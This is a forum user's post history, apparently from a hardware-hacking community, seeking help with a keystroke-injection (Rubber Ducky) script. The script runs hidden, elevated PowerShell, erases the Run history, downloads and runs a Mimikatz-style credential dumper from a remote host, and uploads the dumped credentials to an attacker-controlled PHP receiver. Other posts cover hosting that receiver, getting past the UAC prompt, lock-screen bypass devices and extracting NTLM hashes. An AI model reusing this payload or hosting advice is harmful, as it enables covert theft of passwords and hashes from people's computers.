Posts posted by mhuggins
-
Yes, I did try manually. What appears to happen is that after the first string completes it opens the UAC dialog box but doesn't work after that. I have to physically click the dialog box then press ALT y myself... almost like the UAC box isn't the active window, if that makes sense. I thought maybe it was the delay that was the problem, but I set it to 10000 and it still wouldn't work. I am using a US keyboard.
-
Below is my code that I pieced together from other scripts, including the Mr. Robot cred dump... Again, I take no credit for this, but I need help.
Win 10 machine with UAC enabled
When I run the script it doesn't get past the UAC yes or no box... any ideas?
I have the ALT y command in there during testing, so it's not both the ALT y or LEFTARROW
Thanks in advance
DELAY 1000
GUI r
DELAY 300
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
ENTER
DELAY 500
REM ALT y
LEFTARROW
DELAY 300
ENTER
DELAY 300
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://www.mysite/md.ps1'); $o = Invoke-Mimidogz -DumpCred; (New-Object Net.WebClient).UploadString('http://www.mysite/rx.php', $o)"
ENTER
-
Trying to decide between the bashbunny or the LAN turtle... Just want to know if the bunny can do the lock screen bypass that the turtle can do, that mubix showcased and Darren talked about.
-
Just now, ThoughtfulDev said:
Yep just save it as a .php file.
To me it seems that you need to gain some basic knowledge. Not wanting to be rude or sth ^^
I have it... just don't want to be wrong. Thanks bud
-
3 minutes ago, ThoughtfulDev said:
It does not matter, you just have to change the URL accordingly, e.g. if it's in root then you just need yourdomain.com/rx.php.
If it's in e.g. a folder called ducky you need to use yourdomain.com/ducky/rx.php
One last thing... what format do I save the rx file in? Just open Notepad, paste it, then save as... php?
-
Just now, ThoughtfulDev said:
It does not matter, you just have to change the URL accordingly, e.g. if it's in root then you just need yourdomain.com/rx.php.
If it's in e.g. a folder called ducky you need to use yourdomain.com/ducky/rx.php
Thanks, I'll give it a try
-
7 hours ago, ThoughtfulDev said:
Just upload the rx.php to your desired webhost via e.g. Filezilla.
OK, does it matter where in the file structure, or just the root of the website directory?
-
Tw1sT
You said use your domain.com page to host the cred receiving PHP script...
How or where do you do that?
Thanks
[PAYLOAD_UPDATE] QuickCreds
in Payloads
Posted
OK, I got this working like a champ, but quick question... I keep getting the NTLMv2 hash and not NTLM. Is there a way to get the NTLM hash instead of v2?